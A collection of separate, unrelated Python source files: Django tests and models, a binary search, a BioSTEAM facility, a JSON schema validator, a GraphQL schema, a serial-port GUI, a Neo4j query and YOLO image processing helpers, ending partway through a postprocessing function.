        """An authorized user can remove users from their subscriptions."""
        self.authorized_follower_client.get(
            reverse(
                'posts:profile_follow',
                kwargs={
                    'username': f'{FollowTests.followed_user.username}',
                }
            )
        )
        follower_number_initial = (FollowTests.followed_user.
                                   following.all().count())
        self.authorized_follower_client.get(
            reverse(
                'posts:profile_unfollow',
                kwargs={
                    'username': f'{FollowTests.followed_user.username}',
                }
            )
        )
        follower_number_unfollow = (FollowTests.followed_user.
                                    following.all().count())
        self.assertNotEqual(
            follower_number_initial,
            follower_number_unfollow
        )
    def test_new_posts_appear_in_follower_page(self):
        """A new post appears in the feed of users subscribed to its author
        and does not appear for users who are not subscribed."""
        self.authorized_follower_client.get(
            reverse(
                'posts:profile_follow',
                kwargs={
                    'username': f'{FollowTests.followed_user.username}',
                }
            )
        )
        follower_intial_response = self.authorized_follower_client.get(
            reverse('posts:follow_index')
        )
        followed_intial_response = self.authorized_followed_client.get(
            reverse('posts:follow_index')
        )
        follower_initial_post_quantity = len(follower_intial_response.
                                             context['page'])
        followed_initial_post_quantity = len(followed_intial_response.
                                             context['page'])
        Post.objects.create(
            text='Тестовый текст',
            author=FollowTests.followed_user
        )
        follower_second_response = self.authorized_follower_client.get(
            reverse('posts:follow_index')
        )
        followed_second_response = self.authorized_followed_client.get(
            reverse('posts:follow_index')
        )
        follower_second_post_quantity = len(follower_second_response.
                                            context['page'])
        followed_second_post_quantity = len(followed_second_response.
                                            context['page'])
        # The follower's feed grew by one post...
        self.assertNotEqual(
            follower_initial_post_quantity,
            follower_second_post_quantity
        )
        # ...while the author's own feed is unchanged.
        self.assertEqual(
            followed_initial_post_quantity,
            followed_second_post_quantity
        )
|
class BinarySearch:
    """Binary search over a sorted sequence.

    Holds the sorted sequence and the value to look for; call
    :meth:`binary_search` to get the index of the target or -1.
    """

    def __init__(self, arr, target):
        self.arr = arr          # sorted sequence to search
        self.target = target    # value to locate

    def binary_search(self):
        """Return the index of ``target`` in ``arr``, or -1 if absent.

        Uses a closed interval [lo, hi].  The original version mixed an
        exclusive upper bound (``hi = len(arr)``) with closed-interval
        updates (``hi = mid - 1`` and ``lo < hi``), which skipped index 0
        and the last comparison — e.g. searching 1 in [1, 2, 3] returned -1.
        """
        lo, hi = 0, len(self.arr) - 1
        while lo <= hi:
            # Equivalent to (lo + hi) // 2; this form avoids intermediate
            # overflow in fixed-width-integer languages (Python ints are
            # arbitrary precision, so here it is purely conventional).
            # https://en.wikipedia.org/wiki/Binary_search_algorithm#Implementation_issues
            mid = lo + (hi - lo) // 2
            if self.arr[mid] == self.target:
                return mid
            if self.arr[mid] > self.target:
                hi = mid - 1
            else:
                lo = mid + 1
        return -1
# input in python3 returns a string
# Interactive driver: read the array size, the numbers and the target,
# then print the index found by BinarySearch (or -1).
n = int(input('Enter the size of array'))
# example of using map
# a = ['1', '2'] conver it into int
# a = list(map(int, a)) in python2 this will work a=map(int,a)
# in python3 map returns a map object which is a generator where as in py2 map returns a list
# n is used so that even if we enter n+1 numbers list will only contain n number
arr = list(map(int, input("Enter the number").strip().split()))[:n]
# NOTE(review): the input must already be sorted for binary search to be
# correct — the driver does not sort or validate it.
target = int(input("Enter the number to be searched"))
print(BinarySearch(arr, target).binary_search())
|
# -*- coding: utf-8 -*-
# BioSTEAM: The Biorefinery Simulation and Techno-Economic Analysis Modules
# Copyright (C) 2020-2021, Yoel Cortes-Pena <yoelcortes@gmail.com>
#
# This module is under the UIUC open-source license. See
# github.com/BioSTEAMDevelopmentGroup/biosteam/blob/master/LICENSE.txt
# for license details.
"""
"""
from . import Facility
from ..decorators import cost
from ... import HeatUtility
import numpy as np
__all__ = ('ChilledWaterPackage',)
@cost('Duty', S=-14*4184000, kW=3400*0.7457, cost=1375e3, CE=551, n=0.7, BM=1.5)
class ChilledWaterPackage(Facility):
    """
    Create a chilled water package with capital cost and power based on the flow rate
    of chilled water as in [1]_.
    Parameters
    ----------
    ID : str, optional
        Unit ID.
    References
    ----------
    .. [1] Humbird, D., Davis, R., Tao, L., Kinchin, C., Hsu, D., Aden, A.,
        Dudgeon, D. (2011). Process Design and Economics for Biochemical
        Conversion of Lignocellulosic Biomass to Ethanol: Dilute-Acid
        Pretreatment and Enzymatic Hydrolysis of Corn Stover
        (No. NREL/TP-5100-47764, 1013269). https://doi.org/10.2172/1013269
    """
    ticket_name = 'CWP'
    network_priority = 0
    _N_heat_utilities = 2
    _units = {'Duty': 'kJ/hr'}

    def __init__(self, ID='', agent=None):
        # Default to the built-in 'chilled_water' cooling agent when none is given;
        # the facility's outlet stream and thermo are derived from that agent.
        self.agent = chilled_water = agent or HeatUtility.get_cooling_agent('chilled_water')
        super().__init__(ID,
                         ins='recirculated_chilled_water',
                         outs=chilled_water.to_stream(),
                         thermo=chilled_water.thermo)

    def _load_chilled_water_utilities(self):
        """Collect, from every other unit, the heat utilities that use this
        facility's cooling agent (matched by agent ID) into
        ``self.chilled_water_utilities``."""
        self.chilled_water_utilities = cwu = set()
        ID = self.agent.ID
        for u in self.other_units:
            if u is self: continue  # skip self to avoid double counting
            for hu in u.heat_utilities:
                agent = hu.agent
                if agent and agent.ID == ID: cwu.add(hu)

    def _design(self):
        """Size the package from the system-wide chilled-water demand.

        Sums the duty of all collected chilled-water utilities, mirrors the
        aggregate utility (reversed, since this facility *produces* what the
        other units consume), and charges the cooling-side utility at 330 —
        NOTE(review): presumably the condenser/cooling-water temperature in
        Kelvin; confirm against HeatUtility's call signature.
        """
        self._load_chilled_water_utilities()
        cwu = self.chilled_water_utilities
        self.design_results['Duty'] = duty = sum([i.duty for i in cwu])
        hu_cooling, hu_chilled = self.heat_utilities
        hu_chilled.mix_from(cwu)
        hu_chilled.reverse()
        hu_cooling(duty, 330)
        # Recirculated inlet: total chilled-water flow at the mean outlet
        # temperature of all consumer utility streams.
        used = self.ins[0]
        used.mol[0] = sum([i.flow for i in cwu])
        used.T = np.array([i.outlet_utility_stream.T for i in cwu]).mean()
|
''' Password reset Model '''
from api.models import db
class PasswordReset(db.Model):
    '''Password reset Model class.

    Stores one password-reset token per row, linked to a user.
    '''
    __tablename__ = "password_reset_tokens"
    id = db.Column(db.Integer, primary_key=True)
    # Owning user; a token is meaningless without one.
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable=False)
    reset_token = db.Column(db.String, nullable=False)
    # NOTE(review): expires_at defaults to now(), i.e. tokens are born
    # expired unless a real expiry is supplied — confirm intended TTL.
    expires_at = db.Column(
        db.DateTime, default=db.func.now(), nullable=False)
    created_at = db.Column(
        db.DateTime, default=db.func.now(), nullable=False)
    updated_at = db.Column(db.DateTime, default=db.func.now(),
                           server_onupdate=db.func.now(), nullable=False)

    @classmethod
    def save(cls, user_id, token):
        '''
        Persist a new reset token for the given user.
        '''
        reset_token = cls(user_id=user_id, reset_token=token)
        db.session.add(reset_token)
        db.session.commit()

    @classmethod
    def delete(cls, token_id):
        '''
        Delete the reset token with the given primary key.

        No-op when the id does not exist (the original unconditionally
        passed the ``query.get`` result to ``session.delete``, which
        raises when that result is ``None``).
        '''
        reset_token = cls.query.get(token_id)
        if reset_token is not None:
            db.session.delete(reset_token)
            db.session.commit()
|
#!/usr/bin/python
# import packages
import Tkinter as tk # for the GUI
import ttk # for nicer GUI widgets
import tkMessageBox # for GUI testbox
import serial # for communication with serial port
import time # for time stuff
import threading # for parallel computing
import traceback
import numpy as np
import struct
import datetime
import serial
import time
# A thread that continously request the status of the MWG
class myThread (threading.Thread):
    """Worker thread that builds the CODA control buttons on the global
    Tk ``root`` window once started.  (Python 2 code.)"""
    # initialize class
    def __init__(self, ser, port):
        threading.Thread.__init__(self)
        # Initialize port
        # NOTE(review): `ser` is accepted but never stored or used — the
        # caller passes the string "Updating" here; confirm intent.
        self.port = port
    # # gets called when thread is started with .start()
    def run(self):
        # Relies on module-level `root` and `send_coda_msg` existing by the
        # time the thread is started (they are defined before .start() below).
        mHeader = ttk.Label(root, text = "CODA synchronization").grid(row=0, column=1)
        start_button = ttk.Button(root, text ="START", command = lambda : send_coda_msg('start')).grid(row=1, column=1)
        accept_button = ttk.Button(root, text ="ACCEPT", command = lambda: send_coda_msg('accept')).grid(row=1, column=2)
        reject_button = ttk.Button(root, text ="REJECT", command = lambda: send_coda_msg('reject')).grid(row=1, column=3)
def send_coda_msg(msg):
    """Write a trial marker to the Arduino over the module-level ``port``.

    ``msg`` is one of 'start', 'accept', 'reject'.  Every write is a 'c'
    prefix followed by a little-endian uint16 (``struct.pack('<H', ...)``).
    Accept/reject bracket the marker word with zero words 50 ms apart;
    start sends only the marker word.  Marker values: start=1, accept=2,
    reject=4 (``% 8`` keeps them within 3 bits).
    NOTE(review): Python 2 code — 'c' + struct.pack(...) concatenates str;
    under Python 3 this would raise TypeError (bytes vs str).
    """
    # print "trial count" , trial_count
    if msg == 'accept':
        print 'accept'
        # Leading zero word, then the marker, then a trailing zero word.
        word = 0
        word_str = 'c' + struct.pack('<H', word)
        port.write(word_str)
        time.sleep(0.05)
        trial_count = 2
        word = trial_count % 8
        word_str = 'c' + struct.pack('<H', word)
        port.write(word_str)
        time.sleep(0.05)
        word = 0
        word_str = 'c' + struct.pack('<H', word)
        port.write(word_str)
    elif msg == 'reject':
        print 'reject'
        word = 0
        word_str = 'c' + struct.pack('<H', word)
        port.write(word_str)
        time.sleep(0.05)
        trial_count = 4
        word = trial_count % 8
        word_str = 'c' + struct.pack('<H', word)
        port.write(word_str)
        time.sleep(0.05)
        word = 0
        word_str = 'c' + struct.pack('<H', word)
        port.write(word_str)
    elif msg == 'start':
        print 'start'
        trial_count = 1
        word = trial_count % 8
        #send a 'c' for 'coda' to arduino:
        word_str = 'c' + struct.pack('<H', word)
        port.write(word_str)
    return
# Open the Arduino serial link used for the sync markers.
port = serial.Serial('/dev/arduino_neurosync', baudrate=115200)
# set up root window
root = tk.Tk()
root.geometry("350x50")
root.title("CODA synchronization")
# wait
# Give the serial connection a moment to settle before the thread uses it.
time.sleep(1)
# call and start update-thread
# NOTE(review): myThread(ser, port) — "Updating" is bound to the unused
# `ser` parameter and the serial object to `port`; confirm intent.
thread1 = myThread("Updating", port)
thread1.start()
# start GUI
root.mainloop()
|
"""
# -------------------------------------------------------------------------------
# Name: JSON Schema Validation
# Purpose: Shared JSON Schema Validation for Input JSONS
#
#
# Author: Moe Maysami
#
# Created: Nov 2019
# Licence: See Git
# -------------------------------------------------------------------------------
"""
import platform
from os.path import join, dirname, isabs, exists
import logging
import time
import json
import jsonref
from fastjsonschema import compile as fjs_compile, validate as fjs_validate
from fastjsonschema.exceptions import JsonSchemaException as fjs_JsonSchemaException
from jsonschema import validate, ValidationError
from jsonschema.validators import validator_for
__all__ = ['Json_Validator']
# Module-level logging switch: when True, configure DEBUG-level logging
# with a timestamped format for the whole process.
logIt = True
if logIt:
    loggingConfig = {'level': logging.DEBUG,
                     'format': '[%(asctime)s][%(levelname)s]:%(message)s',
                     'datefmt': '%m/%d/%Y %I:%M:%S %p'
                     }
    logging.basicConfig(**loggingConfig)
logger = logging.getLogger(__name__)
# -----------------------------------------
# Init. Folder/File Constants
# -----------------------------------------
# Default schema location, resolved relative to this file's directory
# inside Json_Validator.__init__.
folder_schema = join('..', 'schema', 'nested')
file_schema = 'schema_nested.json'
# file_valid = 'sample_valid.json'
# file_invalid = 'sample_invalid.json'
# ======================================================================
# Decorators
# ======================================================================
def timeit(method):
    """Decorator that measures the wall-clock run time of *method*.

    If the call carries a ``log_time`` dict keyword, the elapsed time in
    integer milliseconds is stored there under ``log_name`` (default: the
    method name upper-cased); otherwise the timing is logged via the
    module-level ``logger``.  The wrapped function's return value is
    passed through unchanged.
    """
    from functools import wraps  # local import keeps the file's import block untouched

    @wraps(method)  # preserve __name__/__doc__ of the wrapped function
    def timed(*args, **kw):
        ts = time.perf_counter()
        result = method(*args, **kw)
        te = time.perf_counter()
        if 'log_time' in kw:
            name = kw.get('log_name', method.__name__.upper())
            kw['log_time'][name] = int((te - ts) * 1000)
        else:
            logger.info('%6s<--- %s function executed in %2.2f ms' % ("",
                                                                      method.__name__,
                                                                      (te - ts) * 1000))
        return result
    return timed
# ======================================================================
# JSON Validation Class
# ======================================================================
class Json_Validator(object):
    """
    Class of JSON Schema Validation for GM and Sub-Models
    Note1: benchmarks based on https://www.peterbe.com/plog/jsonschema-validate-10x-faster-in-python
    Note2: Inferring schemas from examples using https://jsonschema.net
    Note3: Defining complex/referenced schema based on https://medium.com/grammofy/handling-complex-json-schemas-in-python-9eacc04a60cf
    # json Schema
    # validate(instance, schema, cls=None)
    # Raises
    # jsonschema.exceptions.ValidationError – is invalid
    # jsonschema.exceptions.SchemaError – is invalid
    #
    # cls (IValidator) – The class that will be used to validate the instance.
    # If schema has a $schema property with a known meta-schema, the proper validator will be used.
    # It is recommended that all schemas contain $schema properties for this reason.
    #
    # class jsonschema.IValidator(schema, types=(), resolver=None, format_checker=None)
    """
    # ----------------------------------------------------------------------
    def __init__(self, schema_file=join(folder_schema, file_schema)):
        """Load the schema (resolving relative $ref entries) and pre-build
        both the jsonschema and fastjsonschema validators.

        :param schema_file: path to the JSON schema; relative paths are
            resolved against this module's directory.
        :raises ValueError: when the schema file does not exist.
        """
        # Find Absolute Path of schema_file
        if not isabs(schema_file):
            schema_file = join(dirname(__file__), schema_file)
        if not exists(schema_file):
            raise ValueError("Cannot create class instance with no/missing schema file.")
        # Message for Invalid Jsons
        self.message = "%8s******** WARNING: JSON data is invalid based on schema ********" % ("")
        # Read Schema from JSON Schema File
        self.schema_file = schema_file
        # Load schema from file to class
        # Notes: https://github.com/Julian/jsonschema/issues/98#issuecomment-105475109
        base_path = dirname(self.schema_file)
        # Build a file:// base URI so jsonref can resolve relative $ref entries.
        # Windows needs the three-slash form; every other OS uses two slashes.
        # (The original handled only 'windows' and 'linux' and left base_uri
        # unbound — a NameError — on any other platform, e.g. macOS.)
        if platform.system().lower() == "windows":
            base_uri = 'file:///{}/'.format(base_path.replace("\\", "/"))
        else:
            base_uri = 'file://{}/'.format(base_path.replace("\\", "/"))
        with open(self.schema_file) as fh:
            # jsonref inlines $ref targets so downstream validators see one schema.
            self.schema = jsonref.loads(fh.read(), base_uri=base_uri, jsonschema=True)
        # Create JS Validator (class chosen from the schema's $schema meta-schema)
        self.validator = validator_for(self.schema)
        self.validator.check_schema(self.schema)
        self.validator_fast = self.validator(self.schema)
        # Create Fast JS Validator (compiled once; call it like a function)
        self.validator_fjs = fjs_compile(self.schema)
    # ----------------------------------------------------------------------
    @timeit
    def validate(self, json_input):
        """
        Fast Deployment Using JsonSchema
        :param json_input: Json data to be validated
        :return: Boolean Valid Flag
        """
        try:
            self.validator_fast.validate(json_input)
        except ValidationError as err:
            print(self.message)
            print(err)
            return False
        return True
    # ----------------------------------------------------------------------
    @timeit
    def validate_fjs(self, json_input):
        """
        Fast Deployment Using FastJsonSchema
        :param json_input: Json data to be validated
        :return: Boolean Valid Flag
        """
        try:
            self.validator_fjs(json_input)
        except fjs_JsonSchemaException as err:
            print(self.message)
            print(err)
            return False
        return True
    # ----------------------------------------------------------------------
    @timeit
    def _validate1(self, json_input):
        """
        Slow Aux Deployment Using JsonSchema (re-checks the schema each call)
        :param json_input: Json data to be validated
        :return: Boolean Valid Flag
        """
        try:
            validate(json_input, self.schema, cls=self.validator)
        except ValidationError as err:
            print(self.message)
            print(err)
            return False
        return True
    # ----------------------------------------------------------------------
    @timeit
    def _validate2(self, json_input):
        """
        Slow Aux Deployment Using JsonSchema (validator class re-inferred each call)
        :param json_input: Json data to be validated
        :return: Boolean Valid Flag
        """
        try:
            validate(json_input, self.schema)
        except ValidationError as err:
            print(self.message)
            print(err)
            return False
        return True
    # ----------------------------------------------------------------------
    @timeit
    def _validate3(self, json_input):
        """
        Slow Aux Deployment Using FastJsonSchema (schema recompiled each call)
        :param json_input: Json data to be validated
        :return: Boolean Valid Flag
        """
        try:
            fjs_validate(self.schema, json_input)
        except fjs_JsonSchemaException as err:
            print(self.message)
            print(err)
            return False
        return True
# --------------------------------------------------------------------------------------
# ======================================================================================
# ========== MAIN ==========
# ======================================================================================
# --------------------------------------------------------------------------------------
# Running independent benchmarks of schema validator class
if __name__ == '__main__':
    # Unified Nested Schema
    # NOTE(review): these four assignments are immediately overwritten by the
    # nested-schema block below; they appear to be kept as a quick manual switch.
    folder_test = join('..', 'schema', 'flat')
    file_test = 'schema_flat.json'
    test_valid = 'sample_valid.json'
    test_invalid = 'sample_invalid.json'
    # Complex (Referenced) Nested Schema
    folder_test = join('..','schema', 'nested')
    file_test = 'schema_nested.json'
    test_valid = 'sample_valid.json'
    test_invalid = 'sample_invalid.json'
    logger.info("%2s===> JSON Validation Class" % (""))
    # Benchmarks run against the *invalid* sample, exercising the error paths.
    relative_path = join(folder_test, test_invalid)
    absolute_path = join(dirname(__file__), relative_path)
    logger.info("%6s---> Reading JSON Data File: %s" % ("", absolute_path))
    with open(absolute_path) as json_data_file:
        json_data = json.loads(json_data_file.read())
    logger.info("%6s---> Create Validator Class Instance" % (""))
    jv = Json_Validator(join(folder_test, file_test))
    # Time each validator variant on the same payload (timings via @timeit).
    logger.info("\n" + "-" * 75)
    logger.info("%6s---> Validation Function Json Schema" % (""))
    jv.validate(json_data)
    logger.info("\n" + "-" * 75)
    logger.info("%6s---> Validation Function Fast Json Schema" % (""))
    jv.validate_fjs(json_data)
    logger.info("\n" + "-" * 75)
    logger.info("%6s---> Validation Function Benchmark _1" % (""))
    jv._validate1(json_data)
    logger.info("\n" + "-" * 75)
    logger.info("%6s---> Validation Function Benchmark _2" % (""))
    jv._validate2(json_data)
    logger.info("\n" + "-" * 75)
    logger.info("%6s---> Validation Function Benchmark _3" % (""))
    jv._validate3(json_data)
    logger.info("\n" + "-" * 75)
    logger.info("%2s<=== Validation Completed" % (""))
|
import graphene
from graphene import relay
from graphene_django.filter import DjangoFilterConnectionField
from graphql_jwt.decorators import login_required
from .models import Item, Picture, Storage
from .mutations import (
AddConsumableMutation,
AddItemMutation,
AddPictureMutation,
AddStorageMutation,
DeleteConsumableMutation,
DeleteItemMutation,
DeletePictureMutation,
DeleteStorageMutation,
RestoreItemMutation,
UpdateItemMutation,
UpdatePictureMutation,
UpdateStorageMutation,
)
from .types import (
ItemFilter,
ItemType,
PictureFilter,
PictureType,
StorageFilter,
StorageType,
)
class Query(graphene.ObjectType):
    """Root GraphQL query: relay node fields plus filterable connections
    for items, storages and pictures.  Listing resolvers require login."""
    item = relay.Node.Field(ItemType)
    items = DjangoFilterConnectionField(ItemType, filterset_class=ItemFilter)
    storage = relay.Node.Field(StorageType)
    storages = DjangoFilterConnectionField(StorageType, filterset_class=StorageFilter)
    picture = relay.Node.Field(PictureType)
    pictures = DjangoFilterConnectionField(PictureType, filterset_class=PictureFilter)

    @login_required
    def resolve_items(self, info, **args):
        # Unfiltered base queryset; DjangoFilterConnectionField applies ItemFilter.
        return Item.objects.all()

    @login_required
    def resolve_storages(self, info, **args):
        # Base queryset; StorageFilter narrows it per request arguments.
        return Storage.objects.all()

    @login_required
    def resolve_pictures(self, info, **args):
        # Base queryset; PictureFilter narrows it per request arguments.
        return Picture.objects.all()
class Mutation(graphene.ObjectType):
    """Root GraphQL mutation: CRUD operations for storages, items
    (including restore), consumable links and pictures."""
    update_storage = UpdateStorageMutation.Field()
    update_item = UpdateItemMutation.Field()
    add_storage = AddStorageMutation.Field()
    add_item = AddItemMutation.Field()
    delete_storage = DeleteStorageMutation.Field()
    delete_item = DeleteItemMutation.Field()
    restore_item = RestoreItemMutation.Field()
    add_consumable = AddConsumableMutation.Field()
    delete_consumable = DeleteConsumableMutation.Field()
    add_picture = AddPictureMutation.Field()
    delete_picture = DeletePictureMutation.Field()
    update_picture = UpdatePictureMutation.Field()
|
from py2neo import Graph

# Connect to a Neo4j REST endpoint (legacy '/db/data/' URL style).
graph = Graph("http://192.168.50.52:7475/db/data/")
# Store each _Network_Node's degree (count of distinct neighbours over
# :Edge relationships) back onto the node as a `degree` property.
# NOTE(review): `graph.cypher.execute` is the py2neo v2 API; newer py2neo
# releases use `graph.run` — confirm the pinned library version.
graph.cypher.execute("MATCH (n:_Network_Node)-[:Edge]-(x) WITH n, count(DISTINCT x) as degree SET n.degree = degree")
# for record in res:
# print record;
|
# Read the area to be landscaped (square meters), price it at 7.61 per
# meter, apply an 18% discount, and report both figures.
area_sq_meters = float(input())
base_price = area_sq_meters * 7.61
discount = base_price * 0.18
total_price = base_price - discount
print(f"the total price is {total_price}")
print(f"discount is {discount}")
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-12-01 11:21
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the operaQuizbot app.

    Auto-generated by Django 1.11 (makemigrations); edit with care —
    later migrations depend on the state produced here.  Models created:
    quiz structure (Question/Answer with weighted OperaCategory links),
    category lookups, operas/performances, Facebook pages, user profiles
    and their recorded answers.
    """

    initial = True

    dependencies = [
        # Profile.user is a OneToOneField to the swappable auth user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Answer',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('text', models.CharField(max_length=128)),
            ],
        ),
        # Join model: how strongly an answer indicates an opera category.
        migrations.CreateModel(
            name='AnswerCategoryWeighting',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('weighting', models.FloatField()),
                ('answer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.Answer')),
            ],
        ),
        migrations.CreateModel(
            name='ApproachCultureCategory',
            fields=[
                ('id', models.IntegerField(primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=128, unique=True)),
            ],
        ),
        migrations.CreateModel(
            name='DidYouKnowQuestion',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('text', models.CharField(max_length=256)),
                ('approach_culture', models.ManyToManyField(blank=True, to='operaQuizbot.ApproachCultureCategory')),
            ],
        ),
        migrations.CreateModel(
            name='FacebookPage',
            fields=[
                ('facebook_id', models.BigIntegerField(primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=256)),
            ],
            options={
                'verbose_name': 'Facebook Page',
            },
        ),
        migrations.CreateModel(
            name='FinancialCategory',
            fields=[
                ('id', models.IntegerField(primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=128, unique=True)),
            ],
        ),
        migrations.CreateModel(
            name='Opera',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=128)),
            ],
        ),
        migrations.CreateModel(
            name='OperaCategory',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=128)),
            ],
        ),
        migrations.CreateModel(
            name='OperaGoerCategory',
            fields=[
                ('id', models.IntegerField(primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=128, unique=True)),
            ],
        ),
        migrations.CreateModel(
            name='Performance',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('datetime', models.DateTimeField()),
                ('opera', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.Opera')),
            ],
        ),
        migrations.CreateModel(
            name='Profile',
            fields=[
                # Facebook page-scoped ID is the primary key, not a surrogate.
                ('facebook_psid', models.BigIntegerField(primary_key=True, serialize=False)),
                ('first_name', models.CharField(max_length=128)),
                ('last_name', models.CharField(max_length=128)),
                ('approach_culture', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.ApproachCultureCategory')),
                ('financial', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.FinancialCategory')),
                ('likes', models.ManyToManyField(to='operaQuizbot.FacebookPage', verbose_name='Facebook Likes')),
                ('opera_goer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.OperaGoerCategory')),
            ],
            options={
                'verbose_name': 'User',
            },
        ),
        migrations.CreateModel(
            name='Question',
            fields=[
                ('id', models.IntegerField(primary_key=True, serialize=False)),
                ('text', models.CharField(max_length=128)),
                # Self-referential link forming a linear question chain.
                ('next_question', models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.Question')),
            ],
        ),
        migrations.CreateModel(
            name='ReceivedMessage',
            fields=[
                ('id', models.CharField(max_length=128, primary_key=True, serialize=False)),
            ],
        ),
        # Join model recording which profile gave which answer to which question.
        migrations.CreateModel(
            name='UserAnswer',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('answer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.Answer')),
                ('profile', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.Profile')),
                ('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.Question')),
            ],
        ),
        # M2M fields added after both sides exist (forward-reference ordering).
        migrations.AddField(
            model_name='profile',
            name='recorded_answers',
            field=models.ManyToManyField(through='operaQuizbot.UserAnswer', to='operaQuizbot.Question'),
        ),
        migrations.AddField(
            model_name='profile',
            name='user',
            field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='opera',
            name='categories',
            field=models.ManyToManyField(to='operaQuizbot.OperaCategory'),
        ),
        migrations.AddField(
            model_name='facebookpage',
            name='categories',
            field=models.ManyToManyField(to='operaQuizbot.OperaCategory'),
        ),
        migrations.AddField(
            model_name='didyouknowquestion',
            name='financial',
            field=models.ManyToManyField(blank=True, to='operaQuizbot.FinancialCategory'),
        ),
        migrations.AddField(
            model_name='didyouknowquestion',
            name='opera_goer',
            field=models.ManyToManyField(blank=True, to='operaQuizbot.OperaGoerCategory'),
        ),
        migrations.AddField(
            model_name='answercategoryweighting',
            name='category',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.OperaCategory'),
        ),
        migrations.AddField(
            model_name='answer',
            name='categories',
            field=models.ManyToManyField(through='operaQuizbot.AnswerCategoryWeighting', to='operaQuizbot.OperaCategory'),
        ),
        migrations.AddField(
            model_name='answer',
            name='question',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.Question'),
        ),
        # One recorded answer per (question, profile) pair.
        migrations.AlterUniqueTogether(
            name='useranswer',
            unique_together=set([('question', 'profile')]),
        ),
    ]
|
from boundingbox import BoundingBox
import cv2
import numpy as np
def preprocess(img, input_shape, letter_box=False):
    """Preprocess an image before TRT YOLO inferencing.
    # Args
        img: int8 numpy array of shape (img_h, img_w, 3), BGR channel order
             (it is converted with COLOR_BGR2RGB below)
        input_shape: a tuple of (H, W)
        letter_box: boolean, specifies whether to keep aspect ratio and
            create a "letterboxed" image for inference
    # Returns
        preprocessed img: float32 numpy array of shape (3, H, W),
        values scaled to [0, 1]
    """
    if letter_box:
        img_h, img_w, _ = img.shape
        new_h, new_w = input_shape[0], input_shape[1]
        offset_h, offset_w = 0, 0
        # Scale by the tighter dimension so the resized image fits inside
        # input_shape; the other dimension gets centered gray padding.
        if (new_w / img_w) <= (new_h / img_h):
            new_h = int(img_h * new_w / img_w)
            offset_h = (input_shape[0] - new_h) // 2
        else:
            new_w = int(img_w * new_h / img_h)
            offset_w = (input_shape[1] - new_w) // 2
        resized = cv2.resize(img, (new_w, new_h))
        # Pad with mid-gray (127) around the centered resized image.
        img = np.full((input_shape[0], input_shape[1], 3), 127, dtype=np.uint8)
        img[offset_h:(offset_h + new_h), offset_w:(offset_w + new_w), :] = resized
    else:
        # Plain resize: aspect ratio is not preserved.
        img = cv2.resize(img, (input_shape[1], input_shape[0]))
    img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
    # HWC -> CHW, then normalize to [0, 1].
    img = img.transpose((2, 0, 1)).astype(np.float32)
    img /= 255.0
    return img
def _nms_boxes(detections, nms_threshold):
"""Apply the Non-Maximum Suppression (NMS) algorithm on the bounding
boxes with their confidence scores and return an array with the
indexes of the bounding boxes we want to keep.
# Args
detections: Nx7 numpy arrays of
[[x, y, w, h, box_confidence, class_id, class_prob],
......]
"""
x_coord = detections[:, 0]
y_coord = detections[:, 1]
width = detections[:, 2]
height = detections[:, 3]
box_confidences = detections[:, 4] * detections[:, 6]
areas = width * height
ordered = box_confidences.argsort()[::-1]
keep = list()
while ordered.size > 0:
# Index of the current element:
i = ordered[0]
keep.append(i)
xx1 = np.maximum(x_coord[i], x_coord[ordered[1:]])
yy1 = np.maximum(y_coord[i], y_coord[ordered[1:]])
xx2 = np.minimum(x_coord[i] + width[i], x_coord[ordered[1:]] + width[ordered[1:]])
yy2 = np.minimum(y_coord[i] + height[i], y_coord[ordered[1:]] + height[ordered[1:]])
width1 = np.maximum(0.0, xx2 - xx1 + 1)
height1 = np.maximum(0.0, yy2 - yy1 + 1)
intersection = width1 * height1
union = (areas[i] + areas[ordered[1:]] - intersection)
iou = intersection / union
indexes = np.where(iou <= nms_threshold)[0]
ordered = ordered[indexes + 1]
keep = np.array(keep)
return keep
def postprocess(output, img_w, img_h, input_shape, conf_th=0.8, nms_threshold=0.5, letter_box=False):
    """Postprocess TensorRT outputs.
    # Args
        output: list of detections with schema [x, y, w, h, box_confidence, class_id, class_prob]
        img_w, img_h: original image size in pixels
        input_shape: (H, W) the network ran at
        conf_th: confidence threshold
        nms_threshold: IoU threshold for per-class NMS
        letter_box: boolean, referring to _preprocess_yolo()
    # Returns
        list of bounding boxes with all detections above threshold and after nms, see class BoundingBox
    """
    # filter low-conf detections; overall score = box_confidence * class_prob
    detections = output.reshape((-1, 7))
